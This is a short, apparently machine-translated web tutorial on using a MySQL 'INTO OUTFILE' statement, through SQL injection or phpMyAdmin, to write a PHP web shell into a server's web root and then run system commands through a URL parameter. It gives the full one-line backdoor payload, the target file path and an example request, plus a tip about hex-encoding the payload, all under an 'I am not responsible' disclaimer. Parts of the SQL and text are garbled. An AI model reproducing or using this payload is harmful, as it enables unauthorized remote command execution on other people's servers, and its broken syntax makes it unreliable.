This article mainly introduces how to generate a backdoor Trojan using Mysql statements. do not destroy it at will. you can just study it. Ke, let's take a look. I am not responsible for the consequences.
SELECT * FROM 'vbb _ strikes 'WHERE 1 union select 2,3, distinct from vbb_strikes into outfile 'C:/inetpub/wwwroot/cmd. php' generate cmd under C:/inetpub/wwwroot/by injecting Mysql or running the above statement in phpmyadmin. php file, the content is the original vbb_strikes content, followed by: 2 3 <? Php system ($ _ REQUEST [cmd]);?>
Again through http://www.xxx.com/cmd.php? Cmd = dir c: you can execute the system doscommand!
Which sort is what?
Is <? Php system ($ _ REQUEST [cmd]);?> If you do not use this method, other encodings may appear in different SQL versions, such as % xx. which backdoor cannot be executed! If you have other language names, you can enter them in UltraEdit and press the [Ctrl + H] Key to connect the hex in it!
The above is all the content of this article. I hope you will like it.